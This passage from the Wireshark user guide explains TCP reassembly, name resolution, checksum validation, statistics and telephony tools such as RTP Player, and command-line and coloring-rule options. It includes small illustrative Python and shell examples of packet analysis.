Wireshark will try to find the corresponding packets of this chunk, and will show the combined data as additional pages in the “Packet Bytes” pane (for information about this pane, see Section 3.20, “The “Packet Bytes” Pane”). Reassembly might take place at several protocol layers, so it’s possible that multiple tabs in the “Packet Bytes” pane appear. For example, in an HTTP GET response, the requested data (e.g. an HTML page) is returned. Wireshark will show the hex dump of the data in a new tab “Uncompressed entity body” in the “Packet Bytes” pane. Reassembly is enabled in the preferences by default but can be disabled in the preferences for the protocol in question. Enabling or disabling reassembly settings for a protocol typically requires two things: The tooltip of the higher level protocol setting will notify you if and which lower level protocol setting also has to be considered. Protocols such as HTTP or TLS are likely to span multiple TCP segments. The TCP protocol preference “Allow subdissector to reassemble TCP streams” (enabled by default) makes it possible for Wireshark to collect a contiguous sequence of TCP segments and hand them over to the higher level protocol (for example, to reconstruct a full HTTP message). All but the final segment will be marked with “[TCP segment of a reassembled PDU]” in the packet list. Disable this preference to reduce memory and processing overhead if you are only interested in TCP sequence number analysis (Section 7.5, “TCP Analysis”). Keep in mind, though, that higher level protocols might be wrongly dissected. For example, HTTP messages could be shown as “Continuation” and TLS records could be shown as “Ignored Unknown Record”. Such results can also be observed if you start capturing while a TCP connection was already started or when TCP segments are lost or delivered out-of-order.
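As a rough sketch (illustrative only, not Wireshark's actual implementation), sequence-number-based reassembly of a contiguous byte stream can be expressed like this:

```python
# Buffer TCP-style segments by their starting sequence number and
# emit the contiguous byte stream, stopping at the first gap.
def reassemble(segments, initial_seq=0):
    """segments: list of (seq, data) tuples, possibly out of order."""
    buffered = dict(segments)
    stream = b""
    next_seq = initial_seq
    # Stitch together contiguous segments in sequence-number order.
    while next_seq in buffered:
        data = buffered.pop(next_seq)
        stream += data
        next_seq += len(data)
    return stream

# Segments delivered out of order are still reassembled correctly:
print(reassemble([(3, b"DEF"), (0, b"ABC")]))  # b'ABCDEF'

# With the segment at sequence number 3 missing, reassembly stops
# at the gap, just as a dissector must wait for the missing data:
print(reassemble([(0, b"ABC"), (6, b"GHI")]))  # b'ABC'
```

The second call shows why lost or not-yet-captured segments leave higher-level protocols only partially dissected until the gap is filled.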
To reassemble out-of-order TCP segments, the TCP protocol preference “Reassemble out-of-order segments” (currently disabled by default) must be enabled in addition to the previous preference. If all packets are received in-order, this preference will not have any effect. Otherwise (if missing segments are encountered while sequentially processing a packet capture), it is assumed that the new and missing segments belong to the same PDU. Caveats: Suppose there are two PDUs, ABC and DEF. When received as ABECDF, an application can start processing the first PDU after receiving ABEC. Wireshark, however, requires the missing segment D to be received as well. This issue will be addressed in the future. Unless a second analysis pass is used (e.g. tshark -2), the previous scenario will display both PDUs in the packet with the last segment (F) rather than displaying them in the first packet that has the final missing segment of a PDU. This issue will be addressed in the future. Response time fields (such as smb.time) might be smaller if the request follows other out-of-order segments (this reflects application behavior). If the previous scenario occurs, however, then the time of the request is based on the frame where all missing segments are received. Regardless of the setting of these two reassembly-related preferences, you can always use the “Follow TCP Stream” option (Section 7.2, “Following Protocol Streams”) which displays segments in the expected order.

Name resolution tries to convert some of the numerical address values into a human readable format. There are two possible ways to do these conversions, depending on the resolution to be done: calling system/network services (like the gethostname() function) and/or resolving from Wireshark specific configuration files. For details about the configuration files Wireshark uses for name resolution and the like, see Appendix B, Files and Folders. The name resolution feature can be enabled individually for the protocol layers listed in the following sections.
Name resolution can be invaluable while working with Wireshark and may even save you hours of work. Unfortunately, it also has its drawbacks. DNS may add additional packets to your capture file. You might run into the observer effect if the extra traffic from Wireshark’s DNS queries and responses affects the problem you’re trying to troubleshoot or any subsequent analysis. The same sort of thing can happen when capturing over a remote connection, e.g. SSH or RDP. Name resolution in the packet list is done while the list is filled. If a name can be resolved after a packet is added to the list, its former entry won’t be changed. As the name resolution results are cached, you can use View → Reload to rebuild the packet list with the correctly resolved names. However, this isn’t possible while a capture is in progress. Try to resolve an Ethernet MAC address (e.g. 00:09:5b:01:02:03) to a human readable name. ARP name resolution (system service): Wireshark will ask the operating system to convert an Ethernet address to the corresponding IP address (e.g. 00:09:5b:01:02:03 → 192.168.0.1). Ethernet codes (ethers file): If the ARP name resolution failed, Wireshark tries to convert the Ethernet address to a known device name, which has been assigned by the user using an ethers file (e.g. 00:09:5b:01:02:03 → homerouter). Ethernet manufacturer codes (manuf file): If neither ARP nor ethers returns a result, Wireshark tries to convert the first 3 bytes of an Ethernet address to an abbreviated manufacturer name, which has been assigned by the IEEE (e.g. 00:09:5b:01:02:03 → Netgear_01:02:03). Try to resolve an IP address (e.g. 216.239.37.99) to a human readable name. DNS name resolution (system/library service): Wireshark will use a name resolver to convert an IP address to the hostname associated with it (e.g. 216.239.37.99 →). Most applications use DNS name resolution synchronously.
For example, your web browser must resolve the host name portion of a URL before it can connect to the server. Capture file analysis is different. A given file might have hundreds, thousands, or millions of IP addresses, so for usability and performance reasons Wireshark uses asynchronous resolution. Both mechanisms convert IP addresses to human readable (domain) names and typically use different sources such as the system hosts file (/etc/hosts) and any configured DNS servers. Since Wireshark doesn’t wait for DNS responses, the host name for a given address might be missing from a given packet when you view it the first time but be present when you view it subsequent times. You can adjust name resolution behavior in the Name Resolution section in the Preferences dialog. You can control resolution itself by adding a hosts file to your personal configuration directory. You can also edit your system hosts file, but that isn’t generally recommended. Try to resolve a TCP/UDP port (e.g. 80) to a human readable name. TCP/UDP port conversion (system service): Wireshark will ask the operating system to convert a TCP or UDP port to its well known name (e.g. 80 → http).

Several network protocols use checksums to ensure data integrity. Applying checksums as described here is also known as redundancy checking. Wireshark will validate the checksums of many protocols, e.g. IP, TCP, UDP, etc. It will do the same calculation as a “normal receiver” would do, and shows the checksum fields in the packet details with a comment, e.g. [correct] or [invalid, must be 0x12345678]. Checksum validation can be switched off for various protocols in the Wireshark protocol preferences, e.g. to (very slightly) increase performance. If checksum validation is enabled and an invalid checksum is detected, features like packet reassembly won’t process the packet. (Note that if the Ethernet hardware detects a bad frame check sequence, it typically throws the frame away internally, so Wireshark never sees such packets at all.)
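The calculation a “normal receiver” performs for IP, TCP and UDP is the ones'-complement Internet checksum defined in RFC 1071; a minimal Python version, using the worked example from the RFC:

```python
# Ones'-complement Internet checksum (RFC 1071), as used by IP/TCP/UDP.
def internet_checksum(data: bytes) -> int:
    if len(data) % 2:            # pad odd-length data with a zero byte
        data += b"\x00"
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
        total = (total & 0xFFFF) + (total >> 16)  # fold the carry back in
    return ~total & 0xFFFF       # final ones'-complement

# Worked example from RFC 1071: words 0x0001 0xF203 0xF4F5 0xF6F7
words = bytes([0x00, 0x01, 0xF2, 0x03, 0xF4, 0xF5, 0xF6, 0xF7])
checksum = internet_checksum(words)
print(hex(checksum))  # 0x220d

# A receiver validates by checksumming the data INCLUDING the
# transmitted checksum field; the result must be 0 ("correct").
print(internet_checksum(words + checksum.to_bytes(2, "big")))  # 0
```

A non-zero result on validation is what Wireshark reports as an invalid checksum, together with the value it expected.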
Higher level checksums are “traditionally” calculated by the protocol implementation and the completed packet is then handed over to the hardware. Recent network hardware can perform advanced features such as IP checksum calculation, also known as checksum offloading. The network driver won’t calculate the checksum itself but will simply hand over an empty (zero or garbage filled) checksum field to the hardware. Checksum offloading can be confusing and having a lot of [invalid] messages on the screen can be quite annoying. As mentioned above, invalid checksums may lead to unreassembled packets, making the analysis of the packet data much harder. You can do two things to avoid this checksum offloading problem: turn off checksum offloading in the network driver, if this option is available, or turn off checksum validation of the specific protocol in the Wireshark preferences.

The “Capture File Properties” dialog shows general information about the current capture file. This dialog shows the following information: Notable information about the capture file. The Resolved Addresses window shows the list of resolved addresses and their host names. Users can choose the Hosts field to display IPv4 and IPv6 addresses only. In this case, the dialog displays host names for each IP address in a capture file with a known host. This host name is typically taken from DNS answers in a capture file. In case of an unknown host name, users can populate it based on a reverse DNS lookup. To do so, follow these steps: Enable Resolve Network Addresses in the View → Name Resolution menu, as this option is disabled by default. Enable Use an external network name resolver in the Preferences → Name Resolution menu. This option is enabled by default. The Ports tab shows the list of service names, ports and types. Wireshark reads the entries for port mappings from the hosts service configuration files. See Section B.3, “Configuration Files” for more information. The protocol hierarchy statistics may show more bytes than are in the capture; this can be caused by continuation frames, TCP protocol overhead, and other undissected data. A single packet can contain the same protocol more than once. In this case, the protocol is counted more than once.
For example, ICMP replies and many tunneling protocols will carry more than one IP header. Shows the distribution of packet lengths and related information. Information is broken down by packet length ranges as shown above. The range of packet lengths. Ranges can be configured in the “Statistics → Stats Tree” section of the Preferences dialog. Packet bursts are detected by counting the number of packets in a given time interval and comparing that count to the intervals across a window of time. Statistics for the interval with the maximum number of packets are shown. By default, bursts are detected across 5 millisecond intervals and intervals are compared across 100 millisecond windows. These calculations can be adjusted in the “Statistics” section of the Preferences dialog. You can show statistics for a portion of the capture by entering a display filter into the Display filter entry and pressing Apply. Copy copies the statistics to the clipboard. Save as… lets you save the data as text, CSV, YAML, or XML.

The Dynamic Host Configuration Protocol (DHCP) is an option of the Bootstrap Protocol (BOOTP). It dynamically assigns IP addresses and other parameters to a DHCP client. The DHCP (BOOTP) Statistics window displays a table of the number of occurrences of each DHCP message type. The user can filter, copy or save the data into a file. Open Network Computing (ONC) Remote Procedure Call (RPC) uses the TCP or UDP protocols to map a program number to a specific port on a remote machine and call a required service at that port. The ONC-RPC Programs window shows the description for captured program calls, such as program name, its number, version, and other data. The 29West technology now refers to Ultra-Low Latency Messaging (ULLM) technology. It allows sending and receiving a high number of messages per second with microsecond delivery times for zero-latency data delivery.
The Statistics → 29West menu shows: The Access Node Control Protocol (ANCP) is a TCP based protocol which operates between an Access Node and a Network Access Server. The Wireshark ANCP dissector supports the messages listed below: The ANCP window shows the related statistical data. The user can filter, copy or save the data into a file. Building Automation and Control Networks (BACnet) is a communication protocol which provides control for various automated building facilities, such as light control, fire alarm control, and others. Wireshark provides BACnet statistics as a packet counter. You can sort packets by instance ID, IP address, object type or service. Collectd is a system statistics collection daemon. It collects various statistics from your system and converts them for network use. The Collectd statistics window shows counts for values, which are split into type, plugin, and host, as well as a total packets counter. You can filter, copy or save the data to a file. The Domain Name System (DNS) associates different information, such as IP addresses, with domain names. The DNS statistics cover return codes, request-response counts, and counters for various aggregations. The DNS statistics window lists a total count of DNS messages, which are divided into groups by request type (opcode), response code (rcode), query type, and others. You might find these statistics useful for quickly examining the health of a DNS service or for other investigations. See a few possible scenarios below: You can filter, copy or save the data into a file.

The Flow Graph window shows connections between hosts. It displays the packet time, direction, ports and comments for each captured connection. You can filter all connections by ICMP Flows, ICMPv6 Flows, UIM Flows and TCP Flows. The Flow Graph window is used for showing multiple different topics. Based on this, it offers different controls. Each vertical line represents a specific host, which you can see at the top of the window.
The numbers in each row at the very left of the window represent the time of the packet. You can change the time format in the View → Time Display Format menu. If you change the time format, you must relaunch the Flow Graph window to observe the time in the new format. The numbers at both ends of each arrow between hosts represent the port numbers. Left-click a row to select the corresponding packet in the packet list. Right-click on the graph for additional options, such as selecting the previous, current, or next packet in the packet list. This menu also contains shortcuts for moving the diagram. Available controls: Additional shortcuts available for VoIP calls: On a selected RTP stream Additional controls available for VoIP calls: Highway Addressable Remote Transducer over IP (HART-IP) is an application layer protocol. It sends and receives digital information between smart devices and control or monitoring systems. The HART-IP statistics window shows the counters for response, request, publish and error packets. You can filter, copy or save the data to a file. The Hpfeeds protocol provides lightweight authenticated publishing and subscription. It supports arbitrary binary payloads which can be separated into different channels. The HPFEEDS statistics window shows a counter for payload size per channel and opcodes. You can filter, copy or save the data to a file. HTTP request and response statistics are based on the server address and host. Hypertext Transfer Protocol version 2 (HTTP/2) allows multiplexing various HTTP requests and responses over a single connection. It uses a binary encoding which consists of frames. The HTTP/2 statistics window shows the total number of HTTP/2 frames and also provides a breakdown per frame type, such as HEADERS, DATA, and others. As HTTP/2 traffic is typically encrypted with TLS, you must configure decryption to observe HTTP/2 traffic. For more details, see the TLS wiki page. Sametime is a protocol for the IBM Sametime software.
The Sametime statistics window shows the counters for message type, send type, and user status. Show different visual representations of the TCP streams in a capture. The UDP Multicast Streams window shows statistics for all UDP multicast streams. It includes source addresses and ports, destination addresses and ports, packet counters and other data. You can specify the burst interval, the alarm limits and output speeds. To apply new settings, press Apply. With these statistics you can: The Reliable Server Pooling (RSerPool) windows show statistics for the different protocols of Reliable Server Pooling (RSerPool): With these statistics you can: See Thomas Dreibholz’s Reliable Server Pooling (RSerPool) Page and Chapter 3 of Reliable Server Pooling – Evaluation, Optimization and Extension of a Novel IETF Architecture for more details about RSerPool and its protocols. In F5 Networks, TMM stands for Traffic Management Microkernel. It processes all load-balanced traffic on the BIG-IP system. The F5 statistics menu shows packet and byte counts in both the Virtual Server Distribution and tmm Distribution submenus. Each Virtual Server Distribution window contains the statistics for the following data: Each tmm Distribution window contains the statistics for the following data: A line for each tmm, which contains: A line for each ingress and egress (should add to the tmm total), which contains: Internet Protocol version 4 (IPv4) is a core protocol for the internet layer. It uses 32-bit addresses and allows packet routing from one source host to the next one. The Statistics → IPv4 Statistics menu provides the packet counter in the following submenus: All Addresses. Divides data by IP address. Destination and Ports. Divides data by IP address, and further by IP protocol type, such as TCP, UDP, and others. It also shows port numbers. IP Protocol Types. Divides data by IP protocol type. Source and Destination Addresses. Divides data by source and destination IP address. You can see similar statistics in the Statistics → Conversations and Statistics → Endpoints menus.
Internet Protocol version 6 (IPv6) is a core protocol for the internet layer. It uses 128-bit addresses and routes internet traffic. Similar to Section 8.27, “IPv4 Statistics”, the Statistics → IPv6 Statistics menu shows the packet counter in each submenu. Table of Contents Wireshark provides a wide range of telephony-related network statistics which can be accessed via the Telephony menu. These statistics range from specific signaling protocols to analysis of signaling and media flows. If encoded in a compatible encoding, the media flow can even be played. The protocol specific statistics windows display detailed information about specific protocols and might be described in a later version of this document. Some of these statistics are described at the Wireshark wiki pages. The tool for playing VoIP calls is called RTP Player. It shows RTP streams and their waveforms, and allows you to play a stream and export it as audio or payload to a file. Its capabilities depend on the supported codecs. RTP Player is able to play any codec supported by the installed plugins. The codecs supported by RTP Player depend on the version of Wireshark you’re using. The official builds contain all of the plugins maintained by the Wireshark developers, but custom/distribution builds might not include some of those codecs. To check the codecs supported by your copy of Wireshark, follow this procedure: Wireshark can be used for RTP stream analysis. The user can select one or more streams which can be played later. The RTP Player window maintains a playlist (a list of RTP streams) for this purpose. The playlist is created empty when the RTP Player window is opened and destroyed when the window is closed. The RTP Player window can be kept open in the background when not needed and brought to the front later. The playlist is maintained for the lifetime of the window. When the RTP Player window is opened, the playlist can be modified from other tools (Wireshark windows) in three ways: When the playlist is empty, there is no difference between setting the playlist and adding to it. When the RTP Player window is not opened, all three actions above open it. Removing streams from the playlist is useful, for example,
in case the user selected all RTP streams and wants to remove the streams belonging to specific calls found with the VoIP Calls window. The tools below can be used to maintain the content of the playlist; they contain the corresponding buttons. You can use one of the following procedures: Select any RTP packet in the packet list and open the Telephony → RTP → RTP Stream Analysis window. It will show the analysis of the selected forward stream and its reverse stream (if the modifier key is held while opening the window). Then press the play button; the forward and reverse streams are added to the playlist. RTP is usually carried in UDP packets, on random source and destination ports. Therefore, without “help”, Wireshark can’t recognize it and shows just UDP packets. Wireshark recognizes RTP streams based on VoIP signaling, e.g. based on the SDP message in SIP signaling. When the signaling is not captured, Wireshark shows just UDP packets. There are multiple settings which help Wireshark recognize RTP even when there is no related signaling. You can use the Decode As… function from the Analyze menu or from the mouse context menu. Here you can set that traffic on a specific source or destination port should be decoded as RTP. You can save the settings for later use. Use of the Decode As… menu works fine, but for many streams it is arduous. You can enable the heuristic dissector rtp_udp in Analyze → Enabled Protocols; see Section 11.4, “Control Protocol dissection” for details. Once rtp_udp is enabled, Wireshark tries to decode every UDP packet as RTP. If decoding is possible, the packet (and the entire UDP stream) is decoded as RTP. When an RTP stream uses a well-known port, the heuristic dissector ignores it, so you might miss some RTP streams. You can enable the Try heuristic sub-dissectors first setting for the UDP protocol in Edit → Preferences → Protocols → UDP; see Section 11.5, “Preferences”. In this case the heuristic dissector tries to decode a UDP packet even if it uses a well-known port. Processing of RTP and decoding RTP voice takes resources. There are rough estimates you can use as guidelines… The RTP Streams window can show as many streams as found in the capture.
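As a sketch of the Decode As approach outside the GUI, both Wireshark and TShark accept a -d option that forces a dissector onto a given port; the capture file name and port number below are examples, not values from this guide:

```shell
# Decode UDP port 5004 as RTP when no SIP/SDP signaling was captured
# (voip-capture.pcap and port 5004 are hypothetical).
wireshark -d udp.port==5004,rtp -r voip-capture.pcap

# The same mapping with TShark, printing an RTP stream summary:
tshark -d udp.port==5004,rtp -r voip-capture.pcap -q -z rtp,streams
```

The mapping applies only for the current run; to make it permanent, save it in the Decode As dialog as described above.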
Its performance is limited just by memory and CPU. RTP Player can handle 1000+ streams, but take into account that the waveforms are very small in this case. RTP Player creates a temporary file for the decoding of each stream. If your OS or user has an OS-enforced limit on the number of open files (most Unix/Linux systems), you may see fewer streams than were added to the playlist. Warnings are printed on the console in this case, and you will see fewer streams in the playlist than you sent to it from other tools. RTP Player plays audio through the OS sound system, and the OS is responsible for mixing audio when multiple streams are played. In many cases the OS sound system has a limited number of mixed streams it can play/mix. RTP Player tries to handle playback failures and show a warning. If this happens, just mute some streams and start playback again. The RTP Analysis window can handle 1000+ streams, but it is difficult to use with so many streams - it is hard to navigate between them. It is expected that the RTP Analysis window will be used for the analysis of at most a few tens of streams. The VoIP Calls window shows a list of all detected VoIP calls in the captured traffic. It finds calls by their signaling and shows the related RTP streams. The currently supported VoIP protocols are: See VOIPProtocolFamily for an overview of the used VoIP protocols. The VoIP Calls window can be opened as a window showing all protocol types (the Telephony → VoIP Calls window) or limited to SIP messages only (the Telephony → SIP Flows window). The user can use shortcuts: Selection On selected call/calls Available controls are: This menu shows groups of statistical data for mobile communication protocols according to the ETSI GSM standards. The A-Interface Base Station Management Application Part (BSMAP) Statistics window shows the message list and the number of captured messages. It is possible to filter the messages, and to copy or save the data into a file. The Global System for Mobile Communications (GSM) is a standard for mobile networks.
This menu shows a group of statistical data for mobile communication protocols according to the ETSI GSM standard. The “IAX2 Stream Analysis” window shows statistics for the forward and reverse streams of a selected IAX2 call along with a graph. The Integrated Service User Part (ISUP) protocol provides voice and non-voice signaling for telephone communications. The ISUP Messages menu opens the window which shows the related statistics. The user can filter, copy or save the data into a file. Statistics of the captured LTE MAC traffic. This window summarizes the LTE MAC traffic found in the capture. The top pane shows statistics for common channels. Each row in the middle pane shows statistical highlights for exactly one UE/C-RNTI. In the lower pane, you can see, for the currently selected UE/C-RNTI, the traffic broken down by individual channel. The LTE RLC Graph menu launches a graph which shows the LTE Radio Link Control protocol sequence numbers changing over time, along with the acknowledgements which are received in the opposite direction. The image of the RLC Graph is borrowed from the Wireshark wiki. Statistics of the captured LTE RLC traffic. This window summarizes the LTE RLC traffic found in the capture. At the top, the check-box allows this window to include RLC PDUs found within MAC PDUs or not. This will affect both the PDUs counted as well as the display filters generated (see below). The upper list shows summaries of each active UE. Each row in the lower list shows statistical highlights for individual channels within the selected UE. The lower part of the window allows display filters to be generated and set for the selected channel. Note that in the case of Acknowledged Mode channels, if a single direction is chosen, the generated filter will show data in that direction and control PDUs in the opposite direction. The Message Transfer Part level 3 (MTP3) protocol is a part of the Signaling System 7 (SS7).
The Public Switched Telephone Networks use it for the reliable, unduplicated and in-sequence transport of SS7 messaging between communication partners. This menu shows the MTP3 Statistics and MTP3 Summary windows. OSmux is a multiplex protocol which benefits satellite-based GSM back-haul systems by reducing the bandwidth consumption of the voice proxying (RTP-AMR) and signaling traffic. The OSmux menu opens the packet counter window with the related statistical data. The user can filter, copy or save the data into a file. The RTP Streams window shows all RTP streams in the capture file. Streams can be selected there, and other tools can be initiated on the selected streams. The user can use shortcuts: Selection Find Reverse Available controls are: Find Reverse The RTP analysis function takes the selected RTP streams and generates a list of statistics on them, including a graph. The Telephony → RTP → RTP Stream Analysis menu item is enabled only when the selected packet is an RTP packet. When the window is opened, the selected RTP stream is added to the analysis. If the modifier key is held while opening the menu, the reverse RTP stream (if it exists) is added to the window too. Every stream is shown on its own tab. Tabs are numbered as streams are added, and their tooltips show the identification of the stream. When a tab is closed, its number is not reused. The color of a tab matches the color of its graphs on the graph tab. The per-packet statistics show: The side panel to the left of the packet list shows stream statistics: Available shortcuts are: Available controls are: Prepare Filter The graph view shows a graph of: for every stream. Checkboxes below the graph enable or disable the showing of each graph; the per-stream checkbox enables or disables all graphs for that stream. The RTP Player function is a tool for playing VoIP calls. It shows RTP streams and their waveforms, and allows you to play a stream and export it as audio or payload to a file. See the related concepts in Section 9.2, “Playing VoIP Calls”. The Telephony → RTP → RTP Player menu item is enabled only when the selected packet is an RTP packet. When the window is opened, the selected RTP stream is added to the playlist.
If the modifier key is held while opening the menu, the reverse RTP stream (if it exists) is added to the playlist too. The RTP Player window consists of three parts: The waveform view shows a visual presentation of an RTP stream. The colors of the waveform and the playlist row match. The height of the wave shows the volume. The waveform shows error marks for Out of Sequence, Jitter Drops, Wrong Timestamps and Inserted Silence, if they happen in a stream. The playlist shows information about every stream: Setup Frame Controls allow a user to: Inaudible streams The waveform view and the playlist show the state of an RTP stream: The user can control where the audio of a stream is routed: Audio routing can be changed by double-clicking on the first column of a row, by shortcut or by menu. The user can use shortcuts: Selection Go to packet Audio routing Inaudible streams Export options available: for one or more selected non-muted streams for just one selected stream Audio is exported as a multi-channel file - one channel per RTP stream. One or two channels are equal to mono or stereo, but Wireshark can export e.g. 100 channels. For later playing, a tool with multi-channel support must be used. The export of payload function is useful for codecs not supported by Wireshark. In the Real Time Streaming Protocol (RTSP) menu the user can check the Packet Counter window. It shows the total number of RTSP packets, divided into RTSP Response Packets, RTSP Request Packets and Other RTSP Packets. The user can filter, copy or save the data into a file. Stream Control Transmission Protocol (SCTP) is a computer network protocol which provides message transfer in telecommunications at the transport layer. It overcomes some shortcomings of the User Datagram Protocol (UDP) and the Transmission Control Protocol (TCP). SCTP packets consist of the common header and the data chunks. The SCTP Analyze Association window shows the statistics of the captured packets between two endpoints. You can check the different chunk types by selecting the Statistics tab.
In the Endpoint tabs you can see various statistics, such as IP addresses, ports and others. You can also check different graphs here. The SCTP Associations window shows the table with the data for captured packets, such as port and counter. You can also call up the SCTP Analyze Association window by pressing the Analyze button. The Short Message Peer-to-Peer (SMPP) protocol uses the TCP protocol as its transport for exchanging Short Message Service (SMS) messages, mainly between Short Message Service Centers (SMSC). The dissector determines whether the captured packet is SMPP or not by using the heuristics in the fixed header. The SMPP Operations window displays the related statistical data. The user can filter, copy or save the data into a file. The Universal Computer Protocol (UCP) plays a role in transferring Short Messages between a Short Message Service Centre (SMSC) and an application, which uses a transport protocol such as TCP or X.25. The UCP Messages window displays the related statistical data. The user can filter, copy or save the data into a file. H.225 is a telecommunication protocol which is responsible for messages in call signaling and media stream packetization for packet-based multimedia communication systems. The H.225 window shows the counted messages by types and reasons. The user can filter, copy or save the data into a file. The Session Initiation Protocol (SIP) Flows window shows the list of all captured SIP transactions, such as client registrations, messages, calls and so on. This window lists both complete and in-progress SIP transactions. The window has the same features as the VoIP Calls window. The SIP Statistics window shows captured SIP transactions. It is divided into SIP Responses and SIP Requests. In this window the user can filter, copy or save the statistics into a file. Table of Contents The Bluetooth ATT Server Attributes window displays a list of captured Attribute Protocol (ATT) packets.
The user can filter the list by interface or device, and also exclude repetitions by checking the Remove duplicates check box. Handle is a unique attribute which is specific to the device. UUID is a value which defines the type of an attribute. UUID Name is a specified name for the captured packet. The Bluetooth Devices window displays the list of captured information about devices, such as MAC address, Organizationally Unique Identifier (OUI), Name and others. Users can filter it by interface. The Bluetooth HCI Summary window displays the summary of the captured Host Controller Interface (HCI) layer packets. This window allows users to apply filters and choose to display information about specific interfaces or devices. Statistics about captured WLAN traffic can be found under the Wireless menu; the window summarizes the wireless network traffic found in the capture. Probe requests are merged into an existing network if the SSID matches. The Copy button copies the list values to the clipboard in CSV (Comma Separated Values) format. Table of Contents Wireshark’s default behaviour will usually suit your needs pretty well. However, as you become more familiar with Wireshark, it can be customized in various ways to suit your needs even better. In this chapter we explore: You can start Wireshark from the command line, but it can also be started from most window managers as well. Wireshark 3.5.0 (v3.5.0rc0-21-gce47866a4337) Interactively dump and analyze network traffic. See https://www.wireshark.org for more information. Usage: wireshark [options] ... [ <infile> ] -k start capturing immediately (def: do nothing) -S update packet display when new packets are captured -l turn on automatic scrolling while -S is in use (no pipes or stdin!)
Processing: -R <read filter>, --read-filter <read filter> packet filter in read filter syntax --enable-protocol <proto_name> enable dissection of proto_name --disable-protocol <proto_name> disable dissection of proto_name --enable-heuristic <short_name> enable dissection of heuristic protocol --disable-heuristic <short_name> disable dissection of heuristic protocol User interface: -C <config profile> start with specified configuration profile -H hide the capture info dialog during packet capture -Y <display filter>, --display-filter <display filter> start with the given display filter -g <packet number> go to specified packet number after "-r" -J <jump filter> jump to the first packet matching the (display) filter -j search backwards for a matching packet after "-J" -t a|ad|adoy|d|dd|e|r|u|ud|udoy output format of time stamps --capture-comment <comment> set the capture file comment, if supported Miscellaneous: -h, --help display this help and exit -v, --version display version info and exit -P <key>:<path> persconf:path - personal configuration files persdata:path - personal data files -o <name>:<value> ... override preference or recent setting -K <keytab> keytab file to use for kerberos decryption --display <X display> X display to use --fullscreen start Wireshark in full screen We will examine each of the command line options in turn. The first thing to notice is that issuing the command wireshark by itself will bring up Wireshark. However, you can include as many of the command line parameters as you like. Their meanings are as follows (in alphabetical order): Specify a criterion that specifies when Wireshark is to stop writing to a capture file. The criterion is of the form test:value, where test is one of: If a maximum capture file size was specified, this option causes Wireshark to run in “ring buffer” mode, with the specified number of files. In “ring buffer” mode, Wireshark will write to several capture files. Their names are based on the number of the file and on the creation date and time.
When the first capture file fills up, Wireshark will switch to writing to the next file, and so on. With the files option it’s also possible to form a “ring buffer.” This will fill up new files until the number of files specified, at which point the data in the first file will be discarded so a new file can be written. If the optional duration is specified, Wireshark will also switch to the next file when the specified number of seconds has elapsed even if the current file is not completely filled up. This option is used in conjunction with the -k option. Print a list of the interfaces on which Wireshark can capture, then exit. This is especially useful on Windows, where the interface name is a GUID. Note that “can capture” means that Wireshark was able to open that device to do a live capture. If, on your system, a program doing a network capture must be run from an account with special privileges, then, if Wireshark is run with the -D flag and is not run from such an account, it will not list any interfaces. Set the name of the network interface or pipe to use for live packet capture. Network interface names should match one of the names listed in wireshark -D (described above). A number, as reported by wireshark -D, can also be used. If you’re using UNIX, netstat -i, ifconfig -a or ip link might also work to list interface names. If no valid interface is specified, Wireshark reports an error and doesn’t start the capture. Pipe names should be either the name of a FIFO (named pipe) or “-” to read data from the standard input. Data read from pipes must be in standard libpcap format. When used in conjunction with the -r flag, jump to the first packet which matches the filter expression. The filter expression is in display filter format. If an exact match cannot be found, the first packet afterwards is selected. Use this option after the -J option to search backwards for a first packet to go to. The -k option specifies that Wireshark should start capturing packets immediately. This option requires the use of the -i parameter to specify the interface that packet capture will occur from. This option turns on automatic scrolling if the packet display is being updated automatically as packets arrive during a capture (as specified by the -S flag).
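The capture options above can be combined on one command line. A minimal sketch, assuming an interface named eth0 and placeholder size and duration limits:

```shell
# Start capturing immediately (-k) on eth0, writing a ring buffer of
# five files of roughly 10 MB each (-b filesize is in kB);
# -a duration:300 stops the whole capture after five minutes.
wireshark -i eth0 -k -b filesize:10240 -b files:5 -a duration:300
```

The ring buffer keeps only the five newest files, which is useful for long-running captures with bounded disk use.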
Turns on name resolving for particular types of addresses and port numbers. The argument is a string that may contain the following letters: Sets a preference or recent value, overriding the default value and any value read from a preference or recent file. The argument to the flag is a string of the form prefname:value, where prefname is the name of the preference (which is the same name that would appear in the preferences or recent file), and value is the value to which it should be set. Multiple instances of -o <preference settings> can be given on a single command line. An example of setting a single preference would be: wireshark -o mgcp.display_dissect_tree:TRUE An example of setting multiple preferences would be: wireshark -o mgcp.display_dissect_tree:TRUE -o mgcp.udp.callagent_port:2627 You can get a list of all available preference strings from the preferences file. See Appendix B, Files and Folders for details. User access tables can be overridden using “uat,” followed by the UAT file name and a valid record for the file: wireshark -o "uat:user_dlts:\"User 0 (DLT=147)\",\"http\",\"0\",\"\",\"0\",\"\"" The example above would dissect packets with a libpcap data link type 147 as HTTP, just as if you had configured it in the DLT_USER protocol preferences. Note that -p cannot be used to ensure that the only traffic that is captured is traffic sent to or from the machine on which Wireshark is running, broadcast traffic, and multicast traffic to addresses received by that machine. Special path settings are usually detected automatically. This is used for special cases, e.g. starting Wireshark from a known location on a USB stick. The criterion is of the form key:path, where key is one of: This option sets the format of packet timestamps that are displayed in the packet list window. The format can be one of: dd: Delta, which specifies that timestamps are relative to the previous displayed packet. When a capture is started from the command line with -k, this sets the data link type to use while capturing packets.
The values reported by -L are the values that can be used. When a capture is started from the command line with -k, this sets the time stamp type to use while capturing packets. The values reported by --list-time-stamp-types are the values that can be used. Specify an option to be passed to a Wireshark/TShark module. The eXtension option is in the form extension_key:value, where extension_key can be: If a script was loaded with -X lua_script:my.lua, then -X lua_script1:foo will pass the string foo to the my.lua script. If two scripts were loaded, such as -X lua_script:my.lua -X lua_script:other.lua in that order, then -X lua_script2:bar would pass the string bar to the second lua script, i.e., other.lua. A very useful mechanism available in Wireshark is packet colorization. You can set up Wireshark so that it will colorize packets according to a display filter. This allows you to emphasize the packets you might be interested in. You can find a lot of coloring rule examples at the Wireshark Wiki Coloring Rules page. To colorize packets, select View → Coloring Rules…. Wireshark will display the “Coloring Rules” dialog box as shown in Figure 11.1, “The “Coloring Rules” dialog box”. If this is the first time using the Coloring Rules dialog and you’re using the default configuration profile you should see the default rules, shown above. You can create a new rule by clicking on the + button. You can delete one or more rules by clicking the − button. The “copy” button will duplicate a rule. You can edit a rule by double-clicking on its name or filter. In Figure 11.1, “The “Coloring Rules” dialog box” the name of the rule “Checksum Errors” is being edited. Clicking on the foreground and background buttons will open a color chooser 